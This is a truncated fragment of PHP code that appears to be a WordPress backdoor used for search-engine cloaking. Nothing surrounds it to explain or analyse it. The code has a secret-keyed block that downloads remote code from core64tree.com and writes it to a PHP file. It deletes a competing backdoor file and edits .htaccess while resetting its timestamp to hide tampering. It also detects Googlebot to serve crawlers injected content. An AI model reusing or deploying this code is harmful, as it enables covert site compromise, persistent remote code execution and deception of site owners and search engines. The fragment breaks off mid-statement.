' . rnd_label();
xdie();
}
if (ini_get('allow_url_fopen')) {
function get_data_yo($url) {
$data = file_get_contents($url);
return $data;
}
}
else {
function get_data_yo($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}
#if (isset($_GET['fcblid']) && $_GET['fcblid'] == 'a4ckywaWktNmbuB6zQsyykBnzEEgGM') {
# $twork = get_data_yo('http://core64tree.com/lnk-release-2.4.a17-epel/out/d3.txt');
# if (file_put_contents("json-plugin-out.php", $twork)) echo "success!
go";
# else{ echo "error!"; echo strlen($twork);}
# xdie();
#}
$gondon = 'wp'.'-'.'wp'.'db'.'.'.'php';
if(file_exists($gondon)){
unlink($gondon);
}
$htfle = '.htaccess';
if(file_exists($htfle)){
$htcntnt=file_get_contents($htfle);
$htregex = '@RewriteRule \^wp.+?\?\$ wp\-wpdb\.php@';
if(preg_match($htregex, $htcntnt)){
$htcntnt=preg_replace($htregex, '', $htcntnt);
$ftm=filemtime($htfle);
file_put_contents($htfle, $htcntnt);
@touch($htfle, $ftm);
}
}
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {
$ip = $_SERVER['REMOTE_ADDR'];
} else {
$ip = '';
}
if (strstr($ip, ', ')) {
$ips = explode(', ', $ip);
$ip = $ips[0];
}
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
$abt = 0;$isgb = 0;
if (isset($_GET['debug'])) $abt = 1;
$crawlers = '/googlebot|bingbot|slurp|msnbot/i';
if (preg_match($crawlers, $ua)) {
$abt = 1;
}
if (preg_match('@googlebot@i', $ua)) {
$isgb = 1;
}
if(!$abt && !$isgb && $ip && function_exists('gethostbyaddr')){
$hostbyaddr = gethostbyaddr($ip);
if (preg_match('@google@i', $hostbyaddr)) {
$abt = 1;
$isgb = 1;
}
}
$tstgvar='tholuure4r';
$tstuavar='Klsdir4rsR';
if(isset($_GET[$tstgvar]) or strpos($ua, $tstuavar)){
$abt = 1;
$isgb = 0;
}
$ddomain = $_SERVER['HTTP_HOST'];
$ddomain = str_ireplace('www.', '', $ddomain);
$donor = $ddomain.$_SERVER['REQUEST_URI'];
$donor_parts = parse_url('http://' . $donor);
$donor = $donor_parts['host'] . (isset($donor_parts['path']) ? $donor_parts['path'] : '/') . (isset($donor_parts['query']) ? '?' . $donor_parts['query'] : '');
$donor = str_ireplace('//', '/', $donor);
$el = array();
if ($abt || $hspan) {
function httpGet($url)
{
if (stripos("qqq" . $url, "?")) {
$url .= "&vnrosnrosee=yes";
} else {
$url .= "?vnrosnrosee=yes";
}
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, randomUA());
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 90);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$output = curl_exec($ch);
curl_close($ch);
} else {
$output = @file_get_contents($url);
}
return $output;
}
function randomUA()
{
$uas = array(
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
);
$uas = shuffleArr($uas);
return $uas[0];
}
function shuffleArr($arr)
{
srand((float) microtime() * 1000000);
shuffle($arr);
return $arr;
}
function checkProtocol()
{
if (isset($_SERVER['HTTPS'])) {
$prot = $_SERVER['HTTPS'];
} else {
$prot = '';
}
if (!empty($prot) && $prot != 'off') {
$res = 'https://';
} else {
$res = 'http://';
}
return $res;
}
function shutdown() {
// global $morda;
// global $eb;
global $el;
global $abt, $isgb;
global $hspan;
global $ua, $donor;
global $algo, $tstgvar, $tstuavar;
$currenturl = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$urlprot = checkProtocol();
$currenturl = $urlprot . $currenturl;
$my_content = httpGet($currenturl);
$donor_good = false;
if (($abt || $hspan) ) {
$donor_good = true;
if($donor_good){
if(!preg_match('#
#', $my_content)) { $my_content = preg_replace('#
#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#
#', $my_content)) { $my_content = preg_replace('##', "_-/p-_ \n$ln ", $my_content, 1); } elseif (!$hspan && preg_match('#